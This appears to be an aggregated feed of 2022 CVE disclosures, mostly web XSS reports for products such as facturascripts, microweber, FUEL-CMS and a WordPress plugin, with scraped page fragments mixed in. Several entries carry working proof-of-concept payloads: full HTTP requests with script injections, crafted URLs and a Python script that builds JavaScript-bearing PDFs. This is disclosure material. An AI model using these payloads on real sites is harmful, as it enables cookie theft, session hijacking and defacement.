A reflected cross-site scripting (XSS) vulnerability in the component Query.php of arPHP v3.6.0 allows attackers to execute arbitrary web scripts.

This blog will be updated with more information about the vulnerability and the exploitation once the CVE is assigned.

**Discovered by: Mohammed Fadhl Al-Barbari****CVE-ID : WaitListed****Vendor : https://www.ar-php.org/****Vulnerability type : Cross-Site Scripting****Verified on : arPHP 3.6.0****Description :**

Cross-Site Scripting vulnerability was found in arPHP examples. The affected script takes parameters without any filtration. an attacker could execute any JS code or inject an HTML page.

**POCs : Will be avaliable soon****Follow us:**

**Twitter**:  
Mohammed Al-Barbari

**LinkedIn**:  
Mohammed Al-Barbari

CVE-2022-28081: arPHP 3.6.0 - Reflected XSS

An XSS issue was discovered in browser_search_plugin.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.

**MantisBT makes collaboration with team members & clients easy, fast, and professional**

MantisBT is an open source issue tracker that provides a delicate balance between simplicity and power. Users are able to get started in minutes and start managing their projects while collaborating with their teammates and clients effectively. Once you start using it, you will never go back!

**Email Notifications**

Keep your team and clients updated with notifications on issue updates, resolution, or comments.

**Access Control**

Per project role based access control for users putting you in control of your business.

**Customizable**

Flexibility to customize your issue fields, notifications and workflow.

**Words from our users**

  

"We've come to respect mantis for its powerful simplicity and I go around recommending it to friends and clients alike."

John Zastrow / Tetra Tech, Inc.

"Great product! We tried 6 different issue trackers before settling on Mantis."

John Locke / Freelock Computing

"Very flexible great project, exactly what we need for our software development."

Attila Strba / EnOcean

**Try MantisBT Now!**

It's never been easier to evaluate MantisBT. You can start by one or more of the demo options we have available or just go directly to the downloads page and get the latest version along with the administrator's guide to setup on your own servers.

CVE-2022-28508: Mantis Bug Tracker

Cross-site scripting - Reflected in Create Subaccount in GitHub repository neorazorx/facturascripts prior to 2022.07. This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of `same origin` page, etc ...

**Description**

Cross-site scripting - Reflected in Create Subaccount via codsubcuenta parameter.

**Proof of Concept**

    POST /facturascripts/EditSubcuenta HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=---------------------------363416527826407339693188325960
    Content-Length: 1558
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/facturascripts/EditSubcuenta
    Cookie: fsNick=admin; fsLogkey=6pCG4IKxZ8oOUTkeVg5siaMfyR2q37Bb9JhYvAPlXH1rLWdcmFSNun0wjzQtED; fsLang=en_EN; fsCompany=1; lhc_vid=0155fb94b7b38957dfc4; lhc_rm_u=GW6CXYX9Kvs3laO9i4fjnR7ruXW44H%3A1%3A87494d3c0efceb6d8d9974ea5e6c9f11881b9ee0; organizrLanguage=en; csrf-token-data=%7B%22value%22%3A%22jzfiNNFxYEXZET6aCcebWmglZOg2JPA9SsDylMUM%22%2C%22expiry%22%3A1651160325308%7D; lang=en_US; 
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="action"
    
    insert
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="activetab"
    
    EditSubcuenta
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="code"
    
    
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="multireqtoken"
    
    99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|5yqptN
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="codsubcuenta"
    
    <script>alert(1337)</script>
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="descripcion"
    
    123123
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="codejercicio"
    
    2022
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="idcuenta"
    
    
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="codcuentaesp"
    
    CLIENT
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="debe"
    
    0
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="haber"
    
    0
    -----------------------------363416527826407339693188325960
    Content-Disposition: form-data; name="saldo"
    
    0
    -----------------------------363416527826407339693188325960--
    

**Step to reproduce**

1.  In Accounting section, choose New and fill all form with anything value

2.  Use Burp suite intercept this request and modify codsubcuenta parameter value with XSS payload and click Forward

3.  And alert(1337) execute

**Impact**

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

CVE-2022-1571: Cross-site scripting - Reflected in Create Subaccount in facturascripts

DOM XSS in microweber ver 1.2.15 in GitHub repository microweber/microweber prior to 1.2.16. inject arbitrary js code, deface website, steal cookie...

**Description**

Hi there, on your latest version docker images 3463db62a01f, vulnerable to DOM XSS.

**Proof of Concept**

    http://localhost/admin/order?filteringResults=true&id=1&isPaid=1&keyword=1&maxDate=01/01/1967&maxPrice=1&minDate=01/01/1967&minPrice=1&orderStatus=new&productId=the&productKeyword=the9958%22%0a%09%09%09%09});%0a%09%09%09});%0a%09%09alert(origin);%0a%09%09%09$(document).ready(function%20()%20{%0a%09%09%09%09var%20searchOrdersByProduct%20=%20new%20mw.autoComplete({%0a//
    

 

**Impact**

inject arbitrary js code, deface website, steal cookie...

**Occurrences**

order\_filtering.blade.php L157

DOM code

    $(document).ready(function () {
                    var searchOrdersByProduct = new mw.autoComplete({
                        element: "#js-orders-search-by-products",
                        placeholder: "<?php if ($productKeyword) { echo $productKeyword; } else { _e("Search by products..."); }?>",
                        autoComplete:true,
                        ajaxConfig: {
                            method: 'get',
                            url: mw.settings.api_url + 'get_content_admin?get_extra_data=1&content_type=product&keyword=${val}'
                        },
                        map: {
                            value: 'id',
                            title: 'title',
                            image: 'picture'
                        }
                    });
                    $(searchOrdersByProduct).on("change", function (e, val) {
                        $(".js-orders-search-product").val(val[0].id).trigger('change')
                        $(".js-orders-search-product-keyword").val(val[0].title).trigger('change')
                    });
                });

CVE-2022-1555: DOM XSS in microweber ver 1.2.15  in microweber

Mattermost Playbooks plugin 1.25 and earlier fails to properly restrict user-level permissions, which allows playbook members to escalate their membership privileges and perform actions restricted to playbook admins.

CVE-2022-1548: Security Updates

A cross-site scripting (XSS) vulnerability in /public/admin/index.php?add_product of E-Commerce Website v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Title text field.

**Full-Ecommece-Website-Add\_Product-Stored\_XSS-POC**

*   Note => Login to admin
*   Description => Stored\_XSS at Product Title

**Step to Reproduct**

*   Login to admin -> Add Product -> input payload <img/src/onerror=prompt(10)> at Product Title -> Product Title

**Exploit**

**Vulnerable Code**

 

*   When inserting into the database, the input is not filtered out characters

**POC**

*   Injection Point

\------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_title"

<image/src/onerror=prompt(8)>

*   Request

POST /Full-Ecommece-Website/Codes/public/admin/index.php?add\_product HTTP/1.1
Host: localhost:8080
Content-Length: 1354971
Cache-Control: max-age=0
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXtBAIsNDayF64Ebh
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:8080/Full-Ecommece-Website/Codes/public/admin/index.php?add\_product
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=oam3rcbi14nilh2pp3s21upev5; twk\_uuid\_5c2396fb7a79fc1bddf24b28={"uuid":"1.AGDzvqvmbboNUBtyBA0XLKxrviwKWw7HVKOjPqv5aIOJHjOnigPvpa5cn7QPGv6D5QwLM7ZIIBSpua1NrhQBpEeAdolcmuMk3JJtap3Nu2WjBL31HFdBqMF9VFcu8Olw","version":3,"domain":null,"ts":1647022863776}; TawkConnectionTime=0
Connection: close

------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_title"

<image/src/onerror=prompt(8)>
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_description"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_price"

10000
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="short\_desc"

hacked
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="publish"

Publish
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_category\_id"

12
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="product\_quantity"

1
------WebKitFormBoundaryXtBAIsNDayF64Ebh
Content-Disposition: form-data; name="file"; filename="car.png"
Content-Type: image/png

PNG

VIDEO POC https://drive.google.com/file/d/155K4qLwGI8kwctd5FijU9gzonSA2rMFz/view?usp=sharing

CVE-2022-27330: GitHub - CP04042K/Full-Ecommece-Website-Add_Product-Stored_XSS-POC

IBM Maximo Asset Management 7.6.1.1 and 7.6.1.2 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to inject HTTP HOST header, which will allow the attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 205680.

  

**Summary**

IBM Maximo Asset Management and the IBM Maximo Manage application in IBM Maximo Application Suite are vulnerable to Host header injection.

**Vulnerability Details**

**CVEID:**   CVE-2021-29854  
**DESCRIPTION:**   IBM Maximo Asset Management is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to inject HTTP HOST header, which will allow the attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/205680 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

This vulnerability affects the following versions of the IBM Maximo Asset Management core product and IBM Maximo Manage Application in IBM Maximo Application Suite.  Older versions of Maximo Asset Management may be impacted. The recommended action is to update to the latest version.

**Product versions affected:**

Affected Product(s)

Version(s)

IBM Maximo Asset Management

7.6.1.1

IBM Maximo Asset Management

7.6.1.2

Maximo Manage Application in IBM Maximo Application Suite

MAS 8.7-Manage 8.3

\* To determine the core product version, log in and view System Information. The core product version is the "Tivoli's process automation engine" version. Please consult the Platform Matrix for a list of supported product combinations.

**Remediation/Fixes**

The recommended solution is to download the appropriate Interim Fix or Fix Pack from Fix Central (What is Fix Central?) and apply for each affected product as soon as possible. Please see below for information on the fixes available for each product, version, and release. Follow the installation instructions in the ‘readme’ documentation provided with each fix pack or interim fix.

**For Maximo Asset Management 7.6:**

**For IBM Maximo Manage application in IBM Maximo Application Suite:**

First upgrade to Maximo Application Suite version 8.7.2 and then from the Catalog select Update Available for Manage 8.3.1.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

02 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.

**Document Location**

Worldwide

\[{"Type":"MASTER","Line of Business":{"code":"LOB02","label":"AI Applications"},"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLKT6","label":"IBM Maximo Asset Management"},"ARM Category":\[{"code":"a8m0z000000cvcNAAQ","label":"Security"}\],"Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1"},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL8M","label":"Maximo for Nuclear Power"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL9G","label":"Maximo for Oil and Gas"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL9Z","label":"Maximo for Transportation"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.2.5, 7.6.2.4, 7.6.2.3","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SS5RRF","label":"IBM Maximo for Aviation"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.8, 7.6.7, 7.6.6","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLL84","label":"Maximo for Life Sciences"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLLAM","label":"Maximo for Utilities"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.0.2, 7.6.0.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSG2D3","label":"Maximo Spatial Asset Management"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.0.5, 7.6.0.4, 7.6.0.3, 7.6.0.2","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Type":"MASTER","Line of Business":{"code":"LOB02","label":"AI Applications"},"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSLKSJ","label":"Maximo Asset Configuration Manager"},"ARM Category":\[{"code":"a8m0z000000cvcNAAQ","label":"Security"}\],"Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.6;7.6.7"},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSWT9A","label":"Control Desk"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.1.1, 7.6.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}},{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSKVFR","label":"Maximo for Service Providers"},"Component":"Security","Platform":\[{"code":"PF025","label":"Platform Independent"}\],"Version":"7.6.3.3, 7.6.3.2, 7.6.3.1","Edition":"","Line of Business":{"code":"LOB02","label":"AI Applications"}}\]

CVE-2021-29854: Security Bulletin: IBM Maximo Asset Management and the IBM Maximo Manage application in IBM Maximo Application Suite are vulnerable to Host Header Injection (CVE-2021-29854)

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS 1.5.1 that allows an authenticated user to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.

A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 that allows an authenticated user authorized to upload a malicious .pdf file which acts as a stored XSS payload. If this stored XSS payload is triggered by an administrator it will trigger a XSS attack.  
1、login as admin .in the Assets page  
  
2、Use the following PoC to generate malicious files :

    # FROM https://github.com/osnr/horrifying-pdf-experiments
    import sys
    
    from pdfrw import PdfWriter
    from pdfrw.objects.pdfname import PdfName
    from pdfrw.objects.pdfstring import PdfString
    from pdfrw.objects.pdfdict import PdfDict
    from pdfrw.objects.pdfarray import PdfArray
    
    def make_js_action(js):
        action = PdfDict()
        action.S = PdfName.JavaScript
        action.JS = js
        return action
     
    def make_field(name, x, y, width, height, r, g, b, value=""):
        annot = PdfDict()
        annot.Type = PdfName.Annot
        annot.Subtype = PdfName.Widget
        annot.FT = PdfName.Tx
        annot.Ff = 2
        annot.Rect = PdfArray([x, y, x + width, y + height])
        annot.MaxLen = 160
        annot.T = PdfString.encode(name)
        annot.V = PdfString.encode(value)
     
        # Default appearance stream: can be arbitrary PDF XObject or
        # something. Very general.
        annot.AP = PdfDict()
     
        ap = annot.AP.N = PdfDict()
        ap.Type = PdfName.XObject
        ap.Subtype = PdfName.Form
        ap.FormType = 1
        ap.BBox = PdfArray([0, 0, width, height])
        ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
        ap.stream = """
    %f %f %f rg
    0.0 0.0 %f %f re f
    """ % (r, g, b, width, height)
    
        # It took me a while to figure this out. See PDF spec:
        # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
    
        # Basically, the appearance stream we just specified doesn't
        # follow the field rect if it gets changed in JS (at least not in
        # Chrome).
    
        # But this simple MK field here, with border/color
        # characteristics, _does_ follow those movements and resizes, so
        # we can get moving colored rectangles this way.
        annot.MK = PdfDict()
        annot.MK.BG = PdfArray([r, g, b])
    
        return annot
    
    def make_page(fields, script):
        page = PdfDict()
        page.Type = PdfName.Page
    
        page.Resources = PdfDict()
        page.Resources.Font = PdfDict()
        page.Resources.Font.F1 = PdfDict()
        page.Resources.Font.F1.Type = PdfName.Font
        page.Resources.Font.F1.Subtype = PdfName.Type1
        page.Resources.Font.F1.BaseFont = PdfName.Helvetica
    
        page.MediaBox = PdfArray([0, 0, 612, 792])
    
        page.Contents = PdfDict()
        page.Contents.stream = """
    BT
    /F1 24 Tf
    ET
        """
    
        annots = fields
    
        page.AA = PdfDict()
        # You probably should just wrap each JS action with a try/catch,
        # because Chrome does no error reporting or even logging otherwise;
        # you just get a silent failure.
        page.AA.O = make_js_action("""
    try {
      %s
    } catch (e) {
      app.alert(e.message);
    }
        """ % (script))
    
        page.Annots = PdfArray(annots)
        return page
    
    if len(sys.argv) > 1:
        js_file = open(sys.argv[1], 'r')
    
        fields = []
        for line in js_file:
            if not line.startswith('/// '): break
            pieces = line.split()
            params = [pieces[1]] + [float(token) for token in pieces[2:]]
            fields.append(make_field(*params))
    
        js_file.seek(0)
    
        out = PdfWriter()
        out.addpage(make_page(fields, js_file.read()))
        out.write('result.pdf')
    

  
3、back to Assets then we can see xss-cookie.svg have been upload:  
  
4、when user click the xss.pdf it will trigger a XSS attack

CVE-2022-28599: A stored cross-site scripting (XSS) vulnerability exists in FUEL-CMS-1.5.1 · Issue #595 · daylightstudio/FUEL-CMS

In SpringBootMovie <=1.2 when adding movie names, malicious code can be stored because there are no filtering parameters, resulting in stored XSS.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-28588: 一个后台存储型xss漏洞 · Issue #3 · lkmc2/SpringBootMovie

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

**WordPress Stafflist 3.1.2 Cross Site Scripting**

Posted May 3, 2022

Authored by Hassan Khan Yusufzai

WordPress Stafflist plugin version 3.1.2 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 74269ba0f910606e9499b4b87b6ba8ea243f907c7743fde42c4af10707d6f9da

Download | Favorite | View

**WordPress Stafflist 3.1.2 Cross Site Scripting**

    # Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS (Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Summary:A cross site scripting reflected vulnerability has been identified inWordPress Plugin stafflist version less then 3.1.2. that allowsunauthenticated users to run arbitrary javascript code insideWordPress using Stafflist Plugin.# POChttp://localhost:10003/wp-admin/admin.php?page=stafflist&remove=1&p=1%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E# Vulnerable Parametersp and s parameters are vulnerable.# Vulnerable Code:$html = ($cur > 1 ? "<p class='pager'><ahref='{$stafflisturl}&p=".($cur-1)."&s={$_GET['s']}'>Previous</a></p>" : ""); //<

**File Tags**

*   ActiveX (932)
*   Advisory (77,240)
*   Arbitrary (15,057)
*   BBS (2,859)
*   Bypass (1,550)
*   CGI (1,010)
*   Code Execution (6,627)
*   Conference (668)
*   Cracker (797)
*   CSRF (3,268)
*   DoS (21,736)
*   Encryption (2,330)
*   Exploit (49,655)
*   File Inclusion (4,142)
*   File Upload (938)
*   Firewall (821)
*   Info Disclosure (2,542)
*   Intrusion Detection (850)
*   Java (2,780)
*   JavaScript (792)
*   Kernel (5,997)
*   Local (13,976)
*   Magazine (586)
*   Overflow (12,125)
*   Perl (1,410)
*   PHP (5,038)
*   Proof of Concept (2,276)
*   Protocol (3,290)
*   Python (1,389)
*   Remote (29,590)
*   Root (3,441)
*   Ruby (574)
*   Scanner (1,629)
*   Security Tool (7,672)
*   Shell (3,054)
*   Shellcode (1,201)
*   Sniffer (879)
*   Spoof (2,077)
*   SQL Injection (15,975)
*   TCP (2,350)
*   Trojan (672)
*   UDP (866)
*   Virus (658)
*   Vulnerability (30,362)
*   Web (8,972)
*   Whitepaper (3,710)
*   x86 (942)
*   XSS (17,290)
*   Other

**File Archives**

*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   January 2022
*   December 2021
*   November 2021
*   October 2021
*   September 2021
*   August 2021
*   July 2021
*   June 2021
*   Older

**Systems**

*   AIX (425)
*   Apple (1,875)
*   BSD (368)
*   CentOS (55)
*   Cisco (1,911)
*   Debian (5,948)
*   Fedora (1,690)
*   FreeBSD (1,241)
*   Gentoo (4,152)
*   HPUX (877)
*   iOS (317)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (41,937)
*   Mac OS X (683)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (478)
*   RedHat (11,372)
*   Slackware (941)
*   Solaris (1,606)
*   SUSE (1,444)
*   Ubuntu (7,747)
*   UNIX (9,051)
*   UnixWare (184)
*   Windows (6,373)
*   Other

Tag

#xss